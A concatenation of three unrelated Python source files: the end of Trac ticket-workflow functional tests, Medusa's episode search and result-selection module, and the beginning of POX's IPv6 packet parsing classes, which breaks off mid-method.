name="action_reassign_reassign_owner"') tc.find('<input type="hidden" ' 'name="action_reassign_reassign_owner" ' 'value="lammy" id="action_reassign_reassign_owner" />') tc.find('The owner will remain ' '<span class="trac-author">lammy</span>') tc.notfind('<option selected="selected" value="lammy">lammy</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') class MaySetOwnerOperationDefaultRestrictOwnerNone(FunctionalTwillTestCaseSetup): def runTest(self): """When using the workflow operation `may_set_owner` with restrict_owner=true, the assign-to field will default to an empty option labeled (none) if the ticket currently has no owner. """ env = self._testenv.get_trac_environment() reassign_operations = env.config.get('ticket-workflow', 'reassign.operations') env.config.set('ticket-workflow', 'reassign.operations', 'may_set_owner') env.config.save() try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': ''}) restrict_owner = env.config.get('ticket', 'restrict_owner') env.config.set('ticket', 'restrict_owner', True) env.config.save() self._tester.go_to_ticket(ticket_id) tc.find("The ticket will remain with no owner.") tc.find('The owner will be changed from ' '<span class="trac-author-none">\(none\)</span>') tc.find('<option selected="selected" value="">\(none\)</option>') finally: env.config.set('ticket-workflow', 'reassign.operations', reassign_operations) env.config.set('ticket', 'restrict_owner', restrict_owner) env.config.save() class MaySetOwnerOperationDefaultRestrictOwnerAnonymous(FunctionalTwillTestCaseSetup): def runTest(self): """When using the workflow operation `may_set_owner` with restrict_owner=true, the assign-to dropdown menu will contain a selected option "anonymous" if the ticket is owned by "anonymous". """ env = self._testenv.get_trac_environment() reassign_operations = env.config.get('ticket-workflow', 'reassign.operations') env.config.set('ticket-workflow', 'reassign.operations', 'may_set_owner') restrict_owner = env.config.get('ticket', 'restrict_owner') env.config.set('ticket', 'restrict_owner', False) env.config.save() try: ticket_id = \ self._tester.create_ticket(self.__class__.__name__, info={'owner': 'anonymous'}) env.config.set('ticket', 'restrict_owner', True) env.config.save() self._tester.logout() self._testenv.grant_perm('anonymous', 'TICKET_ADMIN') self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author-anonymous">anonymous</span>') tc.find('<option selected="selected" value="anonymous">' 'anonymous</option>') finally: self._testenv.revoke_perm('anonymous', 'TICKET_ADMIN') self._tester.login('admin') env.config.set('ticket-workflow', 'reassign.operations', reassign_operations) env.config.set('ticket', 'restrict_owner', restrict_owner) env.config.save() class RegressionTestTicket11930(FunctionalTwillTestCaseSetup): def runTest(self): """Test for regression of http://trac.edgewall.org/ticket/11930 Workflow action labels are present on the ticket page. """ self._tester.create_ticket() tc.find('<label for="action_leave">leave</label>[ \n\t]+as new') tc.find('<label for="action_resolve">resolve</label>[ \n\t]+as') tc.find('<label for="action_reassign">reassign</label>[ \n\t]+to') tc.find('<label for="action_accept">accept</label>') def functionalSuite(suite=None): if not suite: import trac.tests.functional suite = trac.tests.functional.functionalSuite() suite.addTests(unittest.makeSuite(SetOwnerOperation)) suite.addTests(unittest.makeSuite(MaySetOwnerOperationRestrictOwnerFalse)) suite.addTest(MaySetOwnerOperationDefaultRestrictOwnerNone()) suite.addTest(MaySetOwnerOperationDefaultRestrictOwnerAnonymous()) suite.addTest(RegressionTestTicket11930()) return suite suite = functionalSuite if __name__ == '__main__': unittest.main(defaultTest='suite')
# coding=utf-8 """Search core module.""" from __future__ import division from __future__ import unicode_literals import datetime import itertools import logging import operator import os import threading import time from medusa import ( app, common, db, failed_history, history, name_cache, notifiers, ui, ) from medusa.clients import torrent from medusa.clients.nzb import ( nzbget, sab, ) from medusa.common import ( MULTI_EP_RESULT, Quality, SEASON_RESULT, SNATCHED, SNATCHED_BEST, SNATCHED_PROPER, UNSET, ) from medusa.helper.common import ( enabled_providers, episode_num, ) from medusa.helper.exceptions import ( AuthException, ex, ) from medusa.helpers import chmod_as_parent from medusa.helpers.utils import to_timestamp from medusa.logger.adapters.style import CustomBraceAdapter from medusa.network_timezones import app_timezone from medusa.show import naming from six import iteritems, itervalues log = CustomBraceAdapter(logging.getLogger(__name__)) log.logger.addHandler(logging.NullHandler()) def _download_result(result): """ Download a result to the appropriate black hole folder. :param result: SearchResult instance to download. :return: boolean, True on success """ res_provider = result.provider if res_provider is None: log.error(u'Invalid provider name - this is a coding error, report it please') return False # nzbs with an URL can just be downloaded from the provider if result.result_type == u'nzb': new_result = res_provider.download_result(result) # if it's an nzb data result elif result.result_type == u'nzbdata': # get the final file path to the nzb file_name = os.path.join(app.NZB_DIR, result.name + u'.nzb') log.info(u'Saving NZB to {0}', file_name) new_result = True # save the data to disk try: with open(file_name, u'wb') as file_out: file_out.write(result.extra_info[0]) chmod_as_parent(file_name) except EnvironmentError as e: log.error(u'Error trying to save NZB to black hole: {0}', ex(e)) new_result = False elif result.result_type == u'torrent': new_result = res_provider.download_result(result) else: log.error(u'Invalid provider type - this is a coding error, report it please') new_result = False return new_result def snatch_result(result): """ Snatch a result that has been found. :param result: SearchResult instance to be snatched. :return: boolean, True on success """ if result is None: return False result.priority = 0 # -1 = low, 0 = normal, 1 = high is_proper = False if app.ALLOW_HIGH_PRIORITY: # if it aired recently make it high priority for cur_ep in result.episodes: if datetime.date.today() - cur_ep.airdate <= datetime.timedelta(days=7): result.priority = 1 if result.proper_tags: log.debug(u'Found proper tags for {0}. Snatching as PROPER', result.name) is_proper = True end_status = SNATCHED_PROPER else: end_status = SNATCHED # Binsearch.info requires you to download the nzb through a post. if result.provider.kind() == 'BinSearchProvider': result.result_type = 'nzbdata' nzb_data = result.provider.download_nzb_for_post(result) result.extra_info.append(nzb_data) if not nzb_data: log.warning('Error trying to get the nzb data from provider binsearch, no data returned') return False # NZBs can be sent straight to SAB or saved to disk if result.result_type in (u'nzb', u'nzbdata'): if app.NZB_METHOD == u'blackhole': result_downloaded = _download_result(result) elif app.NZB_METHOD == u'sabnzbd': result_downloaded = sab.send_nzb(result) elif app.NZB_METHOD == u'nzbget': result_downloaded = nzbget.send_nzb(result, is_proper) else: log.error(u'Unknown NZB action specified in config: {0}', app.NZB_METHOD) result_downloaded = False # Torrents can be sent to clients or saved to disk elif result.result_type == u'torrent': # torrents are saved to disk when blackhole mode # Handle SAVE_MAGNET_FILE if app.TORRENT_METHOD == u'blackhole': result_downloaded = _download_result(result) else: if not result.content and not result.url.startswith(u'magnet:'): if result.provider.login(): if result.provider.kind() == 'TorznabProvider': result.url = result.provider.get_redirect_url(result.url) if not result.url.startswith(u'magnet:'): result.content = result.provider.get_content(result.url) if result.content or result.url.startswith(u'magnet:'): client = torrent.get_client_class(app.TORRENT_METHOD)() result_downloaded = client.send_torrent(result) else: log.warning(u'Torrent file content is empty: {0}', result.name) result_downloaded = False else: log.error(u'Unknown result type, unable to download it: {0!r}', result.result_type) result_downloaded = False if not result_downloaded: return False # Assign the nzb_id depending on the method. # We already have the info_hash (for torrents) in the SearchResult Object. if result.result_type in (u'nzb', u'nzbdata') and app.NZB_METHOD != 'blackhole': # We get this back from sabnzbd or nzbget result.nzb_id = result_downloaded if app.USE_FAILED_DOWNLOADS: failed_history.log_snatch(result) ui.notifications.message(u'Episode snatched', result.name) history.log_snatch(result) # don't notify when we re-download an episode sql_l = [] trakt_data = [] for cur_ep_obj in result.episodes: with cur_ep_obj.lock: if is_first_best_match(result): cur_ep_obj.status = SNATCHED_BEST cur_ep_obj.quality = result.quality else: cur_ep_obj.status = end_status cur_ep_obj.quality = result.quality # Reset all others fields to the snatched status # New snatch by default doesn't have nfo/tbn cur_ep_obj.hasnfo = False cur_ep_obj.hastbn = False # We can't reset location because we need to know what we are replacing # cur_ep_obj.location = '' # Release name and group are parsed in PP cur_ep_obj.release_name = '' cur_ep_obj.release_group = '' # Need to reset subtitle settings because it's a different file cur_ep_obj.subtitles = list() cur_ep_obj.subtitles_searchcount = 0 cur_ep_obj.subtitles_lastsearch = u'0001-01-01 00:00:00' # Need to store the correct is_proper. Not use the old one cur_ep_obj.is_proper = is_proper cur_ep_obj.version = 0 cur_ep_obj.manually_searched = result.manually_searched sql_l.append(cur_ep_obj.get_sql()) if cur_ep_obj.status != common.DOWNLOADED: notifiers.notify_snatch(cur_ep_obj, result) if app.USE_TRAKT and app.TRAKT_SYNC_WATCHLIST: trakt_data.append(cur_ep_obj) log.info( u'Adding {0} {1} to Trakt watchlist', result.series.name, episode_num(cur_ep_obj.season, cur_ep_obj.episode), ) if trakt_data: for episode in trakt_data: notifiers.trakt_notifier.add_episode_to_watchlist(episode) if sql_l: main_db_con = db.DBConnection() main_db_con.mass_action(sql_l) return True def filter_results(results): """ Filter wanted results out of a list of search results for a show. :param results: list of result objects :return: list of wanted result objects """ results = results if isinstance(results, list) else [results] wanted_results = [] # find the best result for the current episode for cur_result in results: assert cur_result.series, 'Every SearchResult object should have a series object available at this point.' # Skip the result if search delay is enabled for the provider if delay_search(cur_result): continue # Every SearchResult object should have a show attribute available at this point. series_obj = cur_result.series # build the black and white list if series_obj.is_anime and series_obj.release_groups: if not series_obj.release_groups.is_valid(cur_result): continue log.info('Quality of {0} is {1}', cur_result.name, Quality.qualityStrings[cur_result.quality]) allowed_qualities, preferred_qualities = series_obj.current_qualities if cur_result.quality not in allowed_qualities + preferred_qualities: log.debug('{0} is an unwanted quality, rejecting it', cur_result.name) continue wanted_episodes = series_obj.want_episodes( cur_result.actual_season, cur_result.actual_episodes, cur_result.quality, download_current_quality=cur_result.download_current_quality, search_type=cur_result.search_type) if not wanted_episodes: continue # If doesnt have min seeders OR min leechers then discard it if cur_result.seeders not in (-1, None) and cur_result.leechers not in (-1, None) \ and hasattr(cur_result.provider, u'minseed') and hasattr(cur_result.provider, u'minleech') \ and (int(cur_result.seeders) < int(cur_result.provider.minseed) or int(cur_result.leechers) < int(cur_result.provider.minleech)): log.info( u'Discarding torrent because it does not meet the minimum provider setting ' u'S:{0} L:{1}. Result has S:{2} L:{3}', cur_result.provider.minseed, cur_result.provider.minleech, cur_result.seeders, cur_result.leechers, ) continue ignored_words = series_obj.show_words().ignored_words required_words = series_obj.show_words().required_words found_ignored_word = naming.contains_at_least_one_word(cur_result.name, ignored_words) found_required_word = naming.contains_at_least_one_word(cur_result.name, required_words) if ignored_words and found_ignored_word: log.info(u'Ignoring {0} based on ignored words filter: {1}', cur_result.name, found_ignored_word) continue if required_words and not found_required_word: log.info(u'Ignoring {0} based on required words filter: {1}', cur_result.name, required_words) continue if not naming.filter_bad_releases(cur_result.name, parse=False): continue if hasattr(cur_result, u'size'): if app.USE_FAILED_DOWNLOADS and failed_history.has_failed(cur_result.name, cur_result.size, cur_result.provider.name): log.info(u'{0} has previously failed, rejecting it', cur_result.name) continue wanted_results.append(cur_result) if wanted_results: log.debug(u'Found wanted results.') else: log.debug(u'No wanted results found.') return wanted_results def sort_results(results): """Sort results based on show specific preferences.""" wanted_results = [] if not results: log.debug(u'No results to sort.') return wanted_results sorted_results = sorted(results, key=operator.attrgetter('quality'), reverse=True) log.debug(u'Sorting the following results: {0}', [x.name for x in sorted_results]) preferred_words = [] if app.PREFERRED_WORDS: preferred_words = [word.lower() for word in app.PREFERRED_WORDS] undesired_words = [] if app.UNDESIRED_WORDS: undesired_words = [word.lower() for word in app.UNDESIRED_WORDS] def percentage(percent, whole): return (percent * whole) / 100.0 initial_score = 100.0 for result in sorted_results: score = initial_score if wanted_results: allowed_qualities, preferred_qualities = result.series.current_qualities if Quality.is_higher_quality(wanted_results[0][0].quality, result.quality, allowed_qualities, preferred_qualities): log.debug(u'Rewarding release {0} (higher quality)', result.name) score += percentage(10, score) initial_score = score if result.proper_tags and (not wanted_results or wanted_results[0][0].quality == result.quality): log.debug(u'Rewarding release {0} (repack/proper/real/rerip)', result.name) # Stop at max. 4 proper tags for _tag in result.proper_tags[:4]: score += percentage(2, score) if any(word in result.name.lower() for word in undesired_words): log.debug(u'Penalizing release {0} (contains undesired word(s))', result.name) score -= percentage(20, score) if any(word in result.name.lower() for word in preferred_words): log.debug(u'Rewarding release {0} (contains preferred word(s))', result.name) score += percentage(20, score) wanted_results.append((result, score)) wanted_results.sort(key=operator.itemgetter(1), reverse=True) header = '{0:<6} {1}'.format('Score', 'Release') log.debug( u'Computed result scores:' u'\n{header}' u'\n{results}', { 'header': header, 'results': '\n'.join( '{score:<6.2f} {name}'.format(score=item[1], name=item[0].name) for item in wanted_results ) } ) return [result[0] for result in wanted_results] def pick_result(wanted_results): """Pick the first result out of a list of wanted candidates.""" candidates = sort_results(wanted_results) if not candidates: log.debug(u'No results to pick from.') return None best_result = candidates[0] log.info(u'Picked {0} as the best result.', best_result.name) return best_result def is_first_best_match(result): """ Check if the given result is a best quality match and if we want to stop searching providers here. :param result: to check :return: True if the result is the best quality match else False """ log.debug(u'Checking if we should stop searching for a better quality for for episode {0}', result.name) series_obj = result.episodes[0].series _, preferred_qualities = series_obj.current_qualities # Don't pass allowed because we only want to check if this quality is wanted preferred. return Quality.wanted_quality(result.quality, [], preferred_qualities) def wanted_episodes(series_obj, from_date): """ Get a list of episodes that we want to download. :param series_obj: Series these episodes are from :param from_date: Search from a certain date :return: list of wanted episodes """ wanted = [] allowed_qualities, preferred_qualities = series_obj.current_qualities all_qualities = list(set(allowed_qualities + preferred_qualities)) log.debug(u'Seeing if we need anything from {0}', series_obj.name) con = db.DBConnection() sql_results = con.select( 'SELECT status, quality, season, episode, manually_searched ' 'FROM tv_episodes ' 'WHERE indexer = ? ' ' AND showid = ?' ' AND season > 0' ' AND airdate > ?', [series_obj.indexer, series_obj.series_id, from_date.toordinal()] ) # check through the list of statuses to see if we want any for episode in sql_results: cur_status, cur_quality = int(episode['status'] or UNSET), int(episode['quality'] or Quality.NA) should_search, should_search_reason = Quality.should_search( cur_status, cur_quality, series_obj, episode['manually_searched'] ) if not should_search: continue else: log.debug( u'Searching for {show} {ep}. Reason: {reason}', { u'show': series_obj.name, u'ep': episode_num(episode['season'], episode['episode']), u'reason': should_search_reason, } ) ep_obj = series_obj.get_episode(episode['season'], episode['episode']) ep_obj.wanted_quality = [ quality for quality in all_qualities if Quality.is_higher_quality( cur_quality, quality, allowed_qualities, preferred_qualities ) ] wanted.append(ep_obj) return wanted def search_for_needed_episodes(scheduler_start_time, force=False): """Search providers for needed episodes. :param force: run the search even if no episodes are needed :param scheduler_start_time: timestamp of the start of the search scheduler :return: list of found episodes """ show_list = app.showList from_date = datetime.date.fromordinal(1) episodes = [] for cur_show in show_list: if cur_show.paused: log.debug( u'Not checking for needed episodes of {0} because the show is paused', cur_show.name, ) continue episodes.extend(wanted_episodes(cur_show, from_date)) if not episodes and not force: # nothing wanted so early out, ie: avoid whatever arbitrarily # complex thing a provider cache update entails, for example, # reading rss feeds return [] providers = enabled_providers(u'daily') if not providers: log.warning( u'No NZB/Torrent providers found or enabled in the application config for daily searches.' u' Please check your settings' ) return [] original_thread_name = threading.currentThread().name log.info(u'Using daily search providers') for cur_provider in providers: threading.currentThread().name = u'{thread} :: [{provider}]'.format( thread=original_thread_name, provider=cur_provider.name ) cur_provider.cache.update_cache(scheduler_start_time) single_results = {} multi_results = [] for cur_provider in providers: threading.currentThread().name = u'{thread} :: [{provider}]'.format( thread=original_thread_name, provider=cur_provider.name ) try: found_results = cur_provider.cache.find_needed_episodes(episodes) except AuthException as error: log.error(u'Authentication error: {0}', ex(error)) continue # pick a single result for each episode, respecting existing results for episode_no, results in iteritems(found_results): if results[0].series.paused: log.debug(u'Skipping {0} because the show is paused.', results[0].series.name) continue # if all results were rejected move on to the next episode wanted_results = filter_results(results) if not wanted_results: log.debug(u'All found results for {0} were rejected.', results[0].series.name) continue best_result = pick_result(wanted_results) if episode_no in (SEASON_RESULT, MULTI_EP_RESULT): multi_results.append(best_result) else: # if it's already in the list (from another provider) and # the newly found quality is no better then skip it if episode_no in single_results: allowed_qualities, preferred_qualities = results[0].series.current_qualities if not Quality.is_higher_quality(single_results[episode_no].quality, best_result.quality, allowed_qualities, preferred_qualities): continue single_results[episode_no] = best_result threading.currentThread().name = original_thread_name return combine_results(multi_results, list(itervalues(single_results))) def delay_search(best_result): """Delay the search by ignoring the best result, when search delay is enabled for this provider. If the providers attribute enable_search_delay is enabled for this provider and it's younger then then it's search_delay time (minutes) skip it. For this we need to check if the result has already been stored in the provider cache db, and if it's still younger then the providers attribute search_delay. :param best_result: SearchResult object. :return: True if we want to skipp this result. """ cur_provider = best_result.provider if cur_provider.enable_search_delay and cur_provider.search_delay: # In minutes cur_ep = best_result.episodes[0] log.debug('DELAY: Provider {provider} delay enabled, with an expiration of {delay} hours', {'provider': cur_provider.name, 'delay': round(cur_provider.search_delay / 60, 1)}) from medusa.search.manual import get_provider_cache_results results = get_provider_cache_results( cur_ep.series, show_all_results=False, perform_search=False, season=cur_ep.season, episode=cur_ep.episode, manual_search_type='episode' ) if results.get('found_items'): # If date_added is missing we put it at the end of the list results['found_items'].sort(key=lambda d: d['date_added'] or datetime.datetime.now(app_timezone)) first_result = results['found_items'][0] date_added = first_result['date_added'] # Some results in cache have date_added as 0 if not date_added: log.debug("DELAY: First result in cache doesn't have a valid date, skipping provider.") return False timestamp = to_timestamp(date_added) if timestamp + cur_provider.search_delay * 60 > time.time(): # The provider's delay cooldown time hasn't expired yet. We're holding back the snatch. log.debug( 'DELAY: Holding back best result {best_result} over {first_result} for provider {provider}.' ' The provider is waiting {search_delay_minutes} hours, before accepting the release.' ' Still {hours_left} to go.', { 'best_result': best_result.name, 'first_result': first_result['name'], 'provider': cur_provider.name, 'search_delay_minutes': round(cur_provider.search_delay / 60, 1), 'hours_left': round((cur_provider.search_delay - (time.time() - timestamp) / 60) / 60, 1) } ) return True else: log.debug('DELAY: Provider {provider}, found a result in cache, and the delay has expired. ' 'Time of first result: {first_result}', {'provider': cur_provider.name, 'first_result': date_added}) else: # This should never happen. log.debug( 'DELAY: Provider {provider}, searched cache but could not get any results for: {series} {season_ep}', {'provider': cur_provider.name, 'series': best_result.series.name, 'season_ep': episode_num(cur_ep.season, cur_ep.episode)}) return False def search_providers(series_obj, episodes, forced_search=False, down_cur_quality=False, manual_search=False, manual_search_type=u'episode'): """ Walk providers for information on shows. :param series_obj: Show we are looking for :param episodes: List, episodes we hope to find :param forced_search: Boolean, is this a forced search? :param down_cur_quality: Boolean, should we re-download currently available quality file :param manual_search: Boolean, should we choose what to download? :param manual_search_type: Episode or Season search :return: results for search """ found_results = {} manual_search_results = [] multi_results = [] single_results = [] # build name cache for show name_cache.build_name_cache(series_obj) original_thread_name = threading.currentThread().name if manual_search: log.info(u'Using manual search providers') providers = enabled_providers(u'manualsearch') else: log.info(u'Using backlog search providers') providers = enabled_providers(u'backlog') if not providers: log.warning(u'No NZB/Torrent providers found or enabled in the application config for {0} searches.' u' Please check your settings', 'manual' if manual_search else 'backlog') threading.currentThread().name = original_thread_name for cur_provider in providers: threading.currentThread().name = '{original_thread_name} :: [{provider}]'.format( original_thread_name=original_thread_name, provider=cur_provider.name ) if cur_provider.anime_only and not series_obj.is_anime: log.debug(u'{0} is not an anime, skipping', series_obj.name) continue found_results[cur_provider.name] = {} search_count = 0 search_mode = cur_provider.search_mode # Always search for episode when manually searching when in sponly if search_mode == u'sponly' and (forced_search or manual_search): search_mode = u'eponly' if manual_search and manual_search_type == u'season': search_mode = u'sponly' while True: search_count += 1 if search_mode == u'eponly': log.info(u'Performing episode search for {0}', series_obj.name) else: log.info(u'Performing season pack search for {0}', series_obj.name) try: search_results = [] needed_eps = episodes if not manual_search: cache_search_results = cur_provider.search_results_in_cache(episodes) if cache_search_results: cache_found_results = list_results_for_provider(cache_search_results, found_results, cur_provider) multi_results, single_results = collect_candidates( cache_found_results, cur_provider, multi_results, single_results ) found_eps = itertools.chain(*(result.episodes for result in multi_results + single_results)) needed_eps = [ep for ep in episodes if ep not in found_eps] # We only search if we didn't get any useful results from cache if needed_eps: log.debug(u'Could not find all candidates in cache, searching provider.') search_results = cur_provider.find_search_results(series_obj, needed_eps, search_mode, forced_search, down_cur_quality, manual_search, manual_search_type) # Update the list found_results found_results = list_results_for_provider(search_results, found_results, cur_provider) multi_results, single_results = collect_candidates( found_results, cur_provider, multi_results, single_results ) found_eps = itertools.chain(*(result.episodes for result in multi_results + single_results)) needed_eps = [ep for ep in episodes if ep not in found_eps] except AuthException as error: log.error(u'Authentication error: {0!r}', error) break if not needed_eps and found_results: break elif not cur_provider.search_fallback or search_count == 2: break # Don't fallback when doing manual season search if manual_search_type == u'season': break if search_mode == u'sponly': log.debug(u'Fallback episode search initiated') search_mode = u'eponly' else: log.debug(u'Fallback season pack search initiated') search_mode = u'sponly' # skip to next provider if we have no results to process if not found_results[cur_provider.name]: continue # Update the cache if a manual search is being run if manual_search: # Let's create a list with episodes that we where looking for if manual_search_type == u'season': # If season search type, we only want season packs searched_episode_list = [SEASON_RESULT] else: searched_episode_list = [episode_obj.episode for episode_obj in episodes] + [MULTI_EP_RESULT] for searched_episode in searched_episode_list: if (searched_episode in search_results and cur_provider.cache.update_cache_manual_search(search_results[searched_episode])): # If we have at least a result from one provider, it's good enough to be marked as result manual_search_results.append(True) # Continue because we don't want to pick best results as we are running a manual search by user continue # Remove provider from thread name before return results threading.currentThread().name = original_thread_name if manual_search: # If results in manual search return True, else False return any(manual_search_results) else: return combine_results(multi_results, single_results) def collect_candidates(found_results, provider, multi_results, single_results): """Collect candidates for episode, multi-episode or season results.""" # Collect candidates for multi-episode or season results multi_results = collect_multi_candidates(found_results[provider.name], multi_results) # Collect candidates for single-episode results single_results = collect_single_candidates(found_results[provider.name], single_results) return multi_results, single_results def list_results_for_provider(search_results, found_results, provider): """ Add results for this provider to the search_results dict. The structure is based on [provider_name][episode_number][search_result] :param search_results: New dictionary with search results for this provider :param found_results: Dictionary with existing per provider search results :param provider: Provider object :return: Updated dict found_results """ for cur_ep in search_results: if cur_ep in found_results[provider.name]: found_results[provider.name][cur_ep] += search_results[cur_ep] else: found_results[provider.name][cur_ep] = search_results[cur_ep] # Sort the list by seeders if possible if provider.provider_type == u'torrent' or getattr(provider, u'torznab', None): found_results[provider.name][cur_ep].sort(key=lambda d: int(d.seeders), reverse=True) return found_results def collect_multi_candidates(candidates, results): """Collect mutli-episode and season result candidates.""" multi_results = list(results) new_candidates = [] multi_candidates = (candidate for result, candidate in iteritems(candidates) if result in (SEASON_RESULT, MULTI_EP_RESULT)) multi_candidates = list(itertools.chain(*multi_candidates)) if multi_candidates: new_candidates = filter_results(multi_candidates) return multi_results + new_candidates def collect_single_candidates(candidates, results): """ Collect single-episode result candidates. :param candidates: A list of SearchResult objects we just parsed, which we want to evaluate against the already collected list of results. :param results: The existing list of valid results. """ single_results = list(results) new_candidates = [] # of all the single-ep results narrow it down to the best one for each episode for episode in candidates: if episode in (MULTI_EP_RESULT, SEASON_RESULT): continue # if all results were rejected move on to the next episode wanted_results = filter_results(candidates[episode]) if not wanted_results: continue result_candidates = [] for i, candidate in enumerate(single_results): if episode in candidate.actual_episodes: result_candidates.append(candidate) del single_results[i] best_result = pick_result(result_candidates + wanted_results) new_candidates.append(best_result) return single_results + new_candidates def combine_results(multi_results, single_results): """Combine single and multi-episode results, filtering out overlapping results.""" log.debug(u'Combining single and multi-episode results') result_candidates = [] multi_results = sort_results(multi_results) for candidate in multi_results: if result_candidates: # check if these eps are already covered by another multi-result multi_needed_eps = [] multi_not_needed_eps = [] for ep_obj in candidate.episodes: for result in result_candidates: if ep_obj in result.episodes: multi_not_needed_eps.append(ep_obj.episode) else: multi_needed_eps.append(ep_obj.episode) log.debug(u'Multi-ep check result is multi_needed_eps: {0}, multi_not_needed_eps: {1}', multi_needed_eps, multi_not_needed_eps) if not multi_needed_eps: log.debug( u'All of these episodes were covered by another multi-episode result,' u' ignoring this multi-episode result' ) continue log.debug(u'Adding {0} to multi-episode result candidates', candidate.name) result_candidates.append(candidate) # If there aren't any single results we can return early if not single_results: return result_candidates for multi_result in result_candidates: # remove the single result if we're going to get it with a multi-result for ep_obj in multi_result.episodes: for i, result in enumerate(single_results): if ep_obj in result.episodes: log.debug( u'A needed multi-episode result overlaps with a single-episode result' u' for episode {0}, removing the single-episode results from the list', ep_obj.episode, ) del single_results[i] return single_results + result_candidates
# Copyright 2012,2013 James McCauley # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #====================================================================== # # IPv6 Header Format # # 0 1 2 3 # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |Version| Traffic Class | Flow Label | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Payload Length | Next Header | Hop Limit | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | | # | Source Address | # | | # | | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | | # | Destination Address | # | | # | | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # #====================================================================== """ IPv6 packet classes This is still rough. There are a number of things remaining to do (additional extension header types, payload inference), and there are probably places where the API isn't quite right yet. But it's a start. """ import struct from packet_utils import * from tcp import * from udp import * from icmpv6 import * from packet_base import packet_base from pox.lib.addresses import IPAddr6 from pox.lib.util import init_helper _extension_headers = {} def extension_header_def (header_type): """ Extension Header decorator """ #TODO: Switch to using generic class registry def f (cls): _extension_headers[header_type] = cls cls.TYPE = header_type return cls return f class ExtensionHeader (object): next_header_type = None class NormalExtensionHeader (ExtensionHeader): """ A superclass for many ExtensionHeaders Many Extension Headers follow the same basic format, which is also suggested for future Extension Headers in RFC 6564. """ #TYPE = <type number> def __init__ (self, *args, **kw): self.payload_length = 0 self._init(*args, **kw) init_helper(self, kw) def __len__ (self): """ Returns the packed length """ l = self.payload_length + 2 return ((l + 7) / 8) - 1 @classmethod def unpack_new (cls, raw, offset = 0, max_length = None): """ Unpacks a new instance of this class from a buffer returns (new_offset, object) """ if max_length and max_length < 2: raise TruncatedException() nh,l = struct.unpack_from("!BB", raw, offset) max_length -= 2 l = l * 8 + 6 if max_length is not None and max_length < l: raise TruncatedException() offset += 2 d = cls._unpack_body(raw, offset, nh, l) offset += l d['payload_length'] = l d['next_header_type'] = nh return offset, cls(**d) def pack (self): o = struct.pack("!BB", self.next_header_type, len(self)) return o + self._pack_body() def _init (self, *args, **kw): """ Called during initialization Override me """ pass def _pack_body (self): """ Returns the body of this Extension Header packed into bytes Override me """ return b'' @classmethod def _unpack_body (cls, raw, offset, next_header_type, length): """ Unpacks the body portion of an Extension Header Override me. """ return {} class FixedExtensionHeader (ExtensionHeader): """ A superclass for fixed length Extension Headers """ #TYPE = <type number> #LENGTH = <total length in bytes> def __init__ (self, *args, **kw): self.next_header_type = None self._init(*args, **kw) init_helper(self, kw) def __len__ (self): """ Returns the packed length """ return self.LENGTH @classmethod def unpack_new (cls, raw, offset = 0, max_length = None): """ Unpacks a new instance of this class from a buffer """ if max_length is not None and (max_length - offset) < cls.LENGTH: raise TruncatedException() nh = struct.unpack_from("!B", raw, offset)[0] d = cls._unpack_body(raw, offset + 1, nh, cls.LENGTH - 1) offset += cls.LENGTH d['next_header_type'] = nh return offset, cls(**d) def pack (self): o = struct.pack("!B", self.next_header_type) + self._pack_body() assert len(o) == self.LENGTH, "Bad packed length" return o def _init (self, *args, **kw): """ Called during initialization Override me """ pass def _pack_body (self): """ Returns the body of this Extension Header packed into bytes Override me """ return b'' @classmethod def _unpack_body (self, raw, offset, next_header_type, length): """ Unpacks the body portion of an Extension Header Override me. """ return {} class DummyExtensionHeader (NormalExtensionHeader): """ Just saves the raw body data """ def _init (self, *args, **kw): self.raw_body = b'' def _pack_body (self): return self.raw_body @classmethod def _unpack_body (self, raw, offset, next_header_type, length): return {'raw_body':raw[offset:offset+length]} class DummyFixedExtensionHeader (FixedExtensionHeader): """ Just saves the raw body data """ def _init (self, *args, **kw): self.raw_body = '\x00' * (self.LENGTH - 1) def _pack_body (self): return self.raw_body @classmethod def _unpack_body (self, raw, offset, next_header_type, length): return {'raw_body':raw[offset:offset+length]} #TODO: Implement Extension Headers for real (they're pretty much just # placeholders at present) #TODO: Implement the IPSec options (Authentication and ESP) @extension_header_def(0) class HopByHopOptions (DummyExtensionHeader): pass @extension_header_def(43) class Routing (DummyExtensionHeader): pass @extension_header_def(44) class Fragment (DummyFixedExtensionHeader): LENGTH = 8 pass @extension_header_def(60) class DestinationOptions (DummyExtensionHeader): pass class ipv6 (packet_base): """ IPv6 packet class """ MIN_LEN = 40 ICMP6_PROTOCOL = 58 TCP_PROTOCOL = 6 UDP_PROTOCOL = 17 IGMP_PROTOCOL = 2 NO_NEXT_HEADER = 59 def __init__ (self, raw=None, prev=None, **kw): packet_base.__init__(self) self.prev = prev self.v = 6 self.tc = 0 self.flow = 0 self.payload_length = 0 self.next_header_type = None self.hop_limit = 0 self.srcip = IPAddr6.UNDEFINED self.dstip = IPAddr6.UNDEFINED self.extension_headers = [] self.next = b'' if raw is not None: self.parse(raw) self._init(kw) @property def payload_type (self): """ The last header type """ if len(self.extension_headers): if isinstance(self.extension_headers[-1], ExtensionHeader): return self.extension_headers[-1].next_header_type else: return self.next_header_type return None @payload_type.setter def payload_type (self, value): if len(self.extension_headers): if isinstance(self.extension_headers[-1], ExtensionHeader): 